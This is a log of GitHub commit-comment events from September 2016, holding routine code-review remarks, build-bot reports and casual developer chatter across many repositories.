{"id":"4571442162","type":"CommitCommentEvent","actor":{"login":"sricharan123"},"repo":{"name":"navsreks/DLN-Validation"},"payload":{"comment":{"id":19046511,"position":null,"line":null,"path":null,"commit_id":"b6a5a37b49d328b8842f6a393cc2437b5cb9272d","created_at":"2016-09-15T23:49:03Z","updated_at":"2016-09-15T23:49:03Z","body":"you can call for only driver license observer not for dropdown.\r\n_stateChanged(_DLN)."}},"created_at":"2016-09-15T23:49:03Z"}
{"id":"4571442797","type":"CommitCommentEvent","actor":{"login":"jailson-dias"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19046513,"position":7,"line":98,"path":"amadeus/settings.py","commit_id":"f02ce614e72b2f90ecbbb52830dcb94cace64fe9","created_at":"2016-09-15T23:49:16Z","updated_at":"2016-09-15T23:49:16Z","body":"Lembrar de colocar um arquivo local_settings e fazer o acesso ao seu banco local por ele para não ficar acontecendo isso, pois não é legal ficar mudando o usuário e a senha do banco a cada commit."}},"created_at":"2016-09-15T23:49:16Z"}
{"id":"4571445234","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19046518,"position":null,"line":null,"path":null,"commit_id":"1d212abc501f12a4b366baf4296485e67a26c7f6","created_at":"2016-09-15T23:50:00Z","updated_at":"2016-09-15T23:50:00Z","body":"Build report #160321324 for sha 1d212abc501f12a4b366baf4296485e67a26c7f6:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1811%20/%208785%20%2820.61%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-15T23:50:00Z"}
{"id":"4571450579","type":"CommitCommentEvent","actor":{"login":"drbrain"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19046531,"position":null,"line":null,"path":null,"commit_id":"cfb2b14ddce37c3a1c388748e6aaa897ce99923e","created_at":"2016-09-15T23:51:32Z","updated_at":"2016-09-15T23:51:32Z","body":"Built-in JSON doesn't support streaming, does it 😢"}},"created_at":"2016-09-15T23:51:32Z"}
{"id":"4571454398","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19046540,"position":null,"line":null,"path":null,"commit_id":"ad50b2e5df609bb7bb62792e0adefbda3779753c","created_at":"2016-09-15T23:52:41Z","updated_at":"2016-09-15T23:52:41Z","body":"The effect of these values do not match the description of the patch:\r\n\r\nPawn on rank 2 which attack two pawns at the same time ->   bonus = 22\r\nPawn on rank 3 which attack two pawns at the same time ->   bonus = 16\r\nPawn on rank 4 which attack two pawns at the same time ->   bonus = 10\r\nPawn on rank 5 which attack two pawns at the same time ->   bonus = 4\r\nPawn on rank 6 which attack two pawns at the same time ->   bonus = -2\r\n\r\nMaybe you meant the opposite ?"}},"created_at":"2016-09-15T23:52:41Z"}
{"id":"4571454454","type":"CommitCommentEvent","actor":{"login":"timofeysie"},"repo":{"name":"juliemr/ng2-test-seed"},"payload":{"comment":{"id":19046541,"position":null,"line":null,"path":null,"commit_id":"84d591bc9b8dee172c4fc4ac816b72da8aa5503f","created_at":"2016-09-15T23:52:42Z","updated_at":"2016-09-15T23:52:42Z","body":"I tried this out on the RC6 code I had for the Tour of Heroes tutrorial, and got there errors:\r\n```\r\nnpm WARN peerDependencies The peer dependency rxjs@5.0.0-beta.12 included from @angular/router will no\r\nnpm WARN peerDependencies longer be automatically installed to fulfill the peerDependency \r\nnpm WARN peerDependencies in npm 3+. Your application will need to depend on it explicitly.\r\nnpm ERR! Darwin 14.5.0\r\nnpm ERR! argv \"/Users/tim/.nvm/versions/node/v4.4.3/bin/node\" \"/Users/tim/.nvm/versions/node/v4.4.3/bin/npm\" \"i\"\r\nnpm ERR! node v4.4.3\r\nnpm ERR! npm  v2.15.1\r\nnpm ERR! code EPEERINVALID\r\n```\r\n\r\nAlso, when I tried to build this seed with $ npm run build, I got these errors:\r\n```\r\n> ng2-test-seed@0.0.2 build /Users/tim/angular/ng2/julieRaplh\r\n> tsc && npm run copy && npm run copytemplates\r\nnode_modules/@angular/common/src/directives/ng_class.d.ts(46,34): error TS2304: Cannot find name 'Set'.\r\nnode_modules/@angular/common/src/pipes/async_pipe.d.ts(39,38): error TS2304: Cannot find name 'Promise'.\r\nnode_modules/@angular/compiler/src/compile_metadata.d.ts(347,20): error TS2304: Cannot find name 'Set'.\r\n```\r\nSince you don't have an issues tab on this repo, thought I would leave the comments here on this momentous commit.  Also, why is TestBed still listed as experimental?  I was using that to compile templates but it broke the test runs.  Anyhow, that's why I'm interested in your seed, to see how you compile templateUrls for unit tests."}},"created_at":"2016-09-15T23:52:42Z"}
{"id":"4571457747","type":"CommitCommentEvent","actor":{"login":"meseguer1998"},"repo":{"name":"projectgroupie/pg"},"payload":{"comment":{"id":19046551,"position":null,"line":null,"path":null,"commit_id":"04cbfc7520a343bb8e735c9f13b512c359d30a06","created_at":"2016-09-15T23:53:45Z","updated_at":"2016-09-15T23:53:45Z","body":"lol, I just changed permissions on my htdocs folder. I hope it doesn't break anything"}},"created_at":"2016-09-15T23:53:45Z"}
{"id":"4571464988","type":"CommitCommentEvent","actor":{"login":"FernandoAlmeida1"},"repo":{"name":"FernandoAlmeida1/KlebersonSantos_FernandoAlmeida"},"payload":{"comment":{"id":19046568,"position":null,"line":null,"path":null,"commit_id":"d01d4c5503a983740f259ae3e0a770b17039e52f","created_at":"2016-09-15T23:56:02Z","updated_at":"2016-09-15T23:56:02Z","body":"Hi !!!!"}},"created_at":"2016-09-15T23:56:02Z"}
{"id":"4571465274","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19046569,"position":null,"line":null,"path":null,"commit_id":"472a2b72056a1d6b8b7f17fa37fbe4fd99f97581","created_at":"2016-09-15T23:56:08Z","updated_at":"2016-09-15T23:56:08Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/482/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T23:56:08Z"}
{"id":"4571466738","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19046571,"position":null,"line":null,"path":null,"commit_id":"50606722091f844d3652f40d6af0b286ccd33c40","created_at":"2016-09-15T23:56:34Z","updated_at":"2016-09-15T23:56:34Z","body":"FixTransitionRules (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2370 of 2370 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50606722091f844d3652f40d6af0b286ccd33c40-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50606722091f844d3652f40d6af0b286ccd33c40-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T23:56:34Z"}
{"id":"4571467597","type":"CommitCommentEvent","actor":{"login":"l3kn"},"repo":{"name":"egonSchiele/grokking_algorithms"},"payload":{"comment":{"id":19046572,"position":1,"line":1,"path":"04_quicksort/ruby/05_quicksort.rb","commit_id":"33d432bdaf421d78af2bb688ad7bb62219e6c5ad","created_at":"2016-09-15T23:56:50Z","updated_at":"2016-09-15T23:56:50Z","body":"Based on the assumption that all permutations of the input array occur with the same probability,\r\nthe choice of the pivot element should have no influence on the average performance.\r\n\r\nTo be honest, I don't own a copy of the book\r\nand just came across this repository a while ago\r\nand thought it would be a nice chance to write some ruby code :)\r\n\r\nMaybe the book is referring to already sorted (ascending or descending) lists as input,\r\nwhich would require O(n^2) steps and a call stack of depth `n` in this implementation\r\n\r\n```\r\nqs([1,2,3,4,5])\r\n[] + [1] + qs([2,3,4,5])\r\n[] + [1] + [2] + qs([3,4,5])\r\n...\r\n```"}},"created_at":"2016-09-15T23:56:50Z"}
{"id":"4571467826","type":"CommitCommentEvent","actor":{"login":"marti-ezequiel"},"repo":{"name":"damianciancio/LuchaGH"},"payload":{"comment":{"id":19046574,"position":null,"line":null,"path":null,"commit_id":"41b46ef49f7329c259ac43026ebf2d937a0ee592","created_at":"2016-09-15T23:56:55Z","updated_at":"2016-09-15T23:56:55Z","body":"Era mio :v \r\nMe hago cargo del título puesto para el culo"}},"created_at":"2016-09-15T23:56:55Z"}
{"id":"4571468196","type":"CommitCommentEvent","actor":{"login":"prpetten"},"repo":{"name":"rails/rails-observers"},"payload":{"comment":{"id":19046579,"position":4,"line":3,"path":"lib/rails/observers/version.rb","commit_id":"876c522184a4ed26d564833f496ef1bfa7af654a","created_at":"2016-09-15T23:57:02Z","updated_at":"2016-09-15T23:57:02Z","body":"@rafaelfranca Any update on this?"}},"created_at":"2016-09-15T23:57:02Z"}
{"id":"4571469919","type":"CommitCommentEvent","actor":{"login":"michaelArruza"},"repo":{"name":"vhilab/VRITS-2016"},"payload":{"comment":{"id":19046586,"position":null,"line":null,"path":null,"commit_id":"996e5b6c0418e26cbb4c51d293a1c674d0c6e3fd","created_at":"2016-09-15T23:57:32Z","updated_at":"2016-09-15T23:57:32Z","body":"Day 4. I meant day 4.\r\n"}},"created_at":"2016-09-15T23:57:32Z"}
{"id":"4571471244","type":"CommitCommentEvent","actor":{"login":"tenderlove"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19046593,"position":null,"line":null,"path":null,"commit_id":"cfb2b14ddce37c3a1c388748e6aaa897ce99923e","created_at":"2016-09-15T23:57:57Z","updated_at":"2016-09-15T23:57:57Z","body":"No, and I wouldn't want to write the code that stitches an object together based on parser context when I could just do `each_line` anyway. 😖 "}},"created_at":"2016-09-15T23:57:57Z"}
{"id":"4571471256","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19046594,"position":null,"line":null,"path":null,"commit_id":"e87746ee0d9bda55e39b48eb40a9c741c8734f8b","created_at":"2016-09-15T23:57:58Z","updated_at":"2016-09-15T23:57:58Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#am6RybzNT9-EP5m6L2Wh7w"}},"created_at":"2016-09-15T23:57:58Z"}
{"id":"4571474842","type":"CommitCommentEvent","actor":{"login":"capitalJT"},"repo":{"name":"rmortan/INTRO"},"payload":{"comment":{"id":19046602,"position":null,"line":null,"path":null,"commit_id":"02491da7787fbacdb50433bb378f98ea2170b42c","created_at":"2016-09-15T23:59:03Z","updated_at":"2016-09-15T23:59:03Z","body":"Nice. You merged the commit!\r\n"}},"created_at":"2016-09-15T23:59:03Z"}
{"id":"4565847493","type":"CommitCommentEvent","actor":{"login":"capitalJT"},"repo":{"name":"rmortan/INTRO"},"payload":{"comment":{"id":19029966,"position":18,"line":18,"path":"INTRO/INTRO/INTRO/responsive.css","commit_id":"f34be847c2f60e681803bd7a34ae52cad0eb6899","created_at":"2016-09-15T03:01:09Z","updated_at":"2016-09-15T03:01:09Z","body":"I wouldn't include styles for print yet."}},"created_at":"2016-09-15T03:01:09Z"}
{"id":"4565848617","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":19029968,"position":null,"line":null,"path":null,"commit_id":"81cb70a8cae681c70e3b1adb276d0ef93da3fc64","created_at":"2016-09-15T03:01:34Z","updated_at":"2016-09-15T03:01:34Z","body":"すみません、コミット文の意味がわかりません...\r\n\r\nあくまで、\r\nOpen vSwitch が OpenFlow 1.3 で規定される Table-Miss Flow entry の挙動を\r\n完全にサポートできていなかったことを記した記載ですが、\r\nコミット文はそのようになっておりますでしょうか？"}},"created_at":"2016-09-15T03:01:34Z"}
{"id":"4565849859","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19029972,"position":null,"line":null,"path":null,"commit_id":"2e8e92f2627915e275c40c3b870e49ff13491c52","created_at":"2016-09-15T03:02:05Z","updated_at":"2016-09-15T03:02:05Z","body":"So, the pupswap script, with 381 lines that is used as standalone gui/cli app as well as part of rc.sysinit and shutdownconfig... is good enough to be featured somewhere\r\n\r\nMaybe in the Setup menu? or the Puppy Setup dialog?\r\n\r\nnow the icon... maybe execute_interval.svg or execute_yes.svg or something else?"}},"created_at":"2016-09-15T03:02:05Z"}
{"id":"4565852455","type":"CommitCommentEvent","actor":{"login":"Makman2"},"repo":{"name":"meetmangukiya/coala"},"payload":{"comment":{"id":19029976,"position":2,"line":2,"path":"coalib/misc/Compatability.py","commit_id":"aab89d5d53d2d20b154d8ae399cd7bd813960e2e","created_at":"2016-09-15T03:03:10Z","updated_at":"2016-09-15T03:03:10Z","body":"hehe you've introduced my space error here too :3"}},"created_at":"2016-09-15T03:03:10Z"}
{"id":"4565854984","type":"CommitCommentEvent","actor":{"login":"Makman2"},"repo":{"name":"meetmangukiya/coala-bears"},"payload":{"comment":{"id":19029980,"position":20,"line":17,"path":"bears/js/JSComplexityBear.py","commit_id":"e2ea03ae3dd84059de74e2e26133b4dc12534976","created_at":"2016-09-15T03:04:13Z","updated_at":"2016-09-15T03:04:13Z","body":"I would just inline `JSONDecodeError` everywhere, no need to set a variable for that again^^"}},"created_at":"2016-09-15T03:04:13Z"}
{"id":"4565863327","type":"CommitCommentEvent","actor":{"login":"Gilbert88"},"repo":{"name":"Gilbert88/mesos"},"payload":{"comment":{"id":19029993,"position":40,"line":600,"path":"src/slave/containerizer/mesos/containerizer.cpp","commit_id":"9765de296f90e17729cf47f611a6ed612223d578","created_at":"2016-09-15T03:07:59Z","updated_at":"2016-09-15T03:07:59Z","body":"yeah, just not removed yet. will do cleanup all together.\r\n"}},"created_at":"2016-09-15T03:07:59Z"}
{"id":"4565867144","type":"CommitCommentEvent","actor":{"login":"Gilbert88"},"repo":{"name":"Gilbert88/mesos"},"payload":{"comment":{"id":19030000,"position":62,"line":622,"path":"src/slave/containerizer/mesos/containerizer.cpp","commit_id":"9765de296f90e17729cf47f611a6ed612223d578","created_at":"2016-09-15T03:09:25Z","updated_at":"2016-09-15T03:09:25Z","body":"We just moved it from the linux_launcher. temporarily a static function. will update later."}},"created_at":"2016-09-15T03:09:25Z"}
{"id":"4565871548","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030009,"position":null,"line":null,"path":null,"commit_id":"0997ad0eec80c2609a372526bdfc30604541ec0c","created_at":"2016-09-15T03:11:22Z","updated_at":"2016-09-15T03:11:22Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1763 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-15T03:11:22Z"}
{"id":"4565872858","type":"CommitCommentEvent","actor":{"login":"calesce"},"repo":{"name":"gaearon/react-hot-loader"},"payload":{"comment":{"id":19030012,"position":null,"line":null,"path":null,"commit_id":"02b1e6dc2d8068fce8bbe63cd2344935d0093909","created_at":"2016-09-15T03:11:55Z","updated_at":"2016-09-15T03:11:55Z","body":"@marshallford `3.0.0-beta.4` is out!"}},"created_at":"2016-09-15T03:11:55Z"}
{"id":"4565873427","type":"CommitCommentEvent","actor":{"login":"tozenji"},"repo":{"name":"csie-asia/hw00-introduction-your-self-tozenji"},"payload":{"comment":{"id":19030013,"position":9,"line":9,"path":"00/src/abc.java","commit_id":"f21832e1a49366720ea6a61c08f92ec9876f8009","created_at":"2016-09-15T03:12:11Z","updated_at":"2016-09-15T03:12:11Z","body":"CHENG ,HSIAO-MEI"}},"created_at":"2016-09-15T03:12:11Z"}
{"id":"4565878434","type":"CommitCommentEvent","actor":{"login":"junghans"},"repo":{"name":"losalamos/flecsi-third-party"},"payload":{"comment":{"id":19030022,"position":null,"line":null,"path":null,"commit_id":"3d2a9652eca0f33c5924784d872093dafcd1afd7","created_at":"2016-09-15T03:14:33Z","updated_at":"2016-09-15T03:14:33Z","body":"@ipdemes @gshipman I hope that fixes it for now."}},"created_at":"2016-09-15T03:14:33Z"}
{"id":"4565883105","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030029,"position":null,"line":null,"path":null,"commit_id":"8b8226a4796b6cc30e977e8d8828d38d92452211","created_at":"2016-09-15T03:16:37Z","updated_at":"2016-09-15T03:16:37Z","body":"makingPrettyTransition (mitchute) - x86_64-MacOS-10.9-clang: OK (2322 of 2329 tests passed, 24 test warnings)\n\n * 10 tests had: AUD diffs.\n * 31 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n * 21 tests had: EIO diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T03:16:37Z"}
{"id":"4565885789","type":"CommitCommentEvent","actor":{"login":"aliedjose"},"repo":{"name":"EstebanC02/LaCuchara-PHP"},"payload":{"comment":{"id":19030036,"position":null,"line":null,"path":null,"commit_id":"f9ffac82984ee899d3c31ddee3ae83fbb1898d8c","created_at":"2016-09-15T03:17:47Z","updated_at":"2016-09-15T03:17:47Z","body":"en si que deseas realizar he observado el proyecto original y tienes redundancia de conexiones.\r\nEvidentemente que alla esta la conexion a nivel local y la mostrada aqui es cuando la subes al hosting .\r\npero mi pregunta es que quieres establecer aqui en relacion a las conexiones o al desarrollo completo del sistema de solicitud de comidas en linea????????????\r\n"}},"created_at":"2016-09-15T03:17:47Z"}
{"id":"4565891005","type":"CommitCommentEvent","actor":{"login":"Fridgey"},"repo":{"name":"GeeItsZee/FloorIsLava"},"payload":{"comment":{"id":19030045,"position":46,"line":253,"path":"src/main/java/com/gmail/tracebachi/FloorIsLava/Arena/Arena.java","commit_id":"36b3063932968d641ae7b0cedb1a6d9b6b2ab96a","created_at":"2016-09-15T03:20:04Z","updated_at":"2016-09-15T03:20:04Z","body":"return playing.size();"}},"created_at":"2016-09-15T03:20:04Z"}
{"id":"4565892684","type":"CommitCommentEvent","actor":{"login":"yangsong8"},"repo":{"name":"expertiza/expertiza"},"payload":{"comment":{"id":19030046,"position":null,"line":null,"path":null,"commit_id":"7e5787311238ed4073c749c3e554844616315af0","created_at":"2016-09-15T03:20:44Z","updated_at":"2016-09-15T03:20:44Z","body":"Fixes #726."}},"created_at":"2016-09-15T03:20:44Z"}
{"id":"4565897679","type":"CommitCommentEvent","actor":{"login":"adamjv90"},"repo":{"name":"jaredpalmer/react-production-starter"},"payload":{"comment":{"id":19030065,"position":null,"line":null,"path":null,"commit_id":"beda13dcebe72fc909451f5ee02b02d50c5a9b2e","created_at":"2016-09-15T03:22:55Z","updated_at":"2016-09-15T03:22:55Z","body":"interesting, I enjoyed using redial. are there any benefits of swapping it out for redux-taxi?"}},"created_at":"2016-09-15T03:22:55Z"}
{"id":"4565904299","type":"CommitCommentEvent","actor":{"login":"mmxe"},"repo":{"name":"ellisware/adapter"},"payload":{"comment":{"id":19030073,"position":null,"line":null,"path":null,"commit_id":"73f80d9008530059709296d35d80a25d91a3ce87","created_at":"2016-09-15T03:25:49Z","updated_at":"2016-09-15T03:25:49Z","body":"Hi Mike. I'm really grateful you made this change. Can you submit it as a pull request to the main project? I'm starting to experiment with the fanuc adapter, and I successfully followed your blog instructions to compile it on Ubuntu (x64).\r\n As soon as I get back to office I'm going to try to merge this commit because I've been wondering why the current release of the adapter code was giving strange results for program name. Can you add a readme.md file to describe the program header format that your code is parsing so I can use that format in my .nc headers?\r\nThanks."}},"created_at":"2016-09-15T03:25:49Z"}
{"id":"4565910029","type":"CommitCommentEvent","actor":{"login":"kovidgoyal"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":19030090,"position":null,"line":null,"path":null,"commit_id":"de6ce95fa77d92320f8ea18cf1103561a06c68d1","created_at":"2016-09-15T03:28:18Z","updated_at":"2016-09-15T03:28:18Z","body":"As I said, I have nothing against being able to enforce typing, I just think the proper place for it is in the linter, not the compiler, as the linter has far more scope for configuration than the compiler. The user can turn off individual checks, ignore particular errors on particular lines or in particular files, etc. If you add this to the compiler behind a flag it is an all or nothing hammer. "}},"created_at":"2016-09-15T03:28:18Z"}
{"id":"4565914069","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030098,"position":null,"line":null,"path":null,"commit_id":"8b8226a4796b6cc30e977e8d8828d38d92452211","created_at":"2016-09-15T03:30:06Z","updated_at":"2016-09-15T03:30:06Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T03:30:06Z"}
{"id":"4565914862","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19030100,"position":null,"line":null,"path":null,"commit_id":"4708d7e5e2c2e2609c173d41f4bf9795633dec19","created_at":"2016-09-15T03:30:25Z","updated_at":"2016-09-15T03:30:25Z","body":"Removed easter egg as well. given its got leaky constructors nor could figure out how to fix it. so for simplicity sake. Gone.  Sorry PermissionSex :8ball: "}},"created_at":"2016-09-15T03:30:25Z"}
{"id":"4565915218","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030101,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:34Z","updated_at":"2016-09-15T03:30:34Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:34Z"}
{"id":"4565915368","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030103,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:38Z","updated_at":"2016-09-15T03:30:38Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:38Z"}
{"id":"4565915380","type":"CommitCommentEvent","actor":{"login":"matthewadams"},"repo":{"name":"SciSpike/yaktor-auth"},"payload":{"comment":{"id":19030104,"position":null,"line":null,"path":null,"commit_id":"1327b1ea48e6a939be88ec0db23eb84f32ccfd3c","created_at":"2016-09-15T03:30:38Z","updated_at":"2016-09-15T03:30:38Z","body":"These changes are for issue https://github.com/SciSpike/yaktor/issues/25, and are depend on PR https://github.com/SciSpike/yaktor-dsl-xtext/pull/9 & https://github.com/SciSpike/yaktor/pull/27"}},"created_at":"2016-09-15T03:30:38Z"}
{"id":"4565915388","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030105,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:39Z","updated_at":"2016-09-15T03:30:39Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:39Z"}
{"id":"4565915413","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030107,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:40Z","updated_at":"2016-09-15T03:30:40Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:40Z"}
{"id":"4565915418","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030106,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:40Z","updated_at":"2016-09-15T03:30:40Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:40Z"}
{"id":"4565915594","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030108,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:44Z","updated_at":"2016-09-15T03:30:44Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:44Z"}
{"id":"4565915600","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030109,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:44Z","updated_at":"2016-09-15T03:30:44Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:44Z"}
{"id":"4565915603","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030110,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:44Z","updated_at":"2016-09-15T03:30:44Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:44Z"}
{"id":"4565915609","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030111,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:45Z","updated_at":"2016-09-15T03:30:45Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:45Z"}
{"id":"4565915620","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030112,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:45Z","updated_at":"2016-09-15T03:30:45Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:45Z"}
{"id":"4565915624","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030113,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:45Z","updated_at":"2016-09-15T03:30:45Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:45Z"}
{"id":"4565915650","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030114,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:45Z","updated_at":"2016-09-15T03:30:45Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:45Z"}
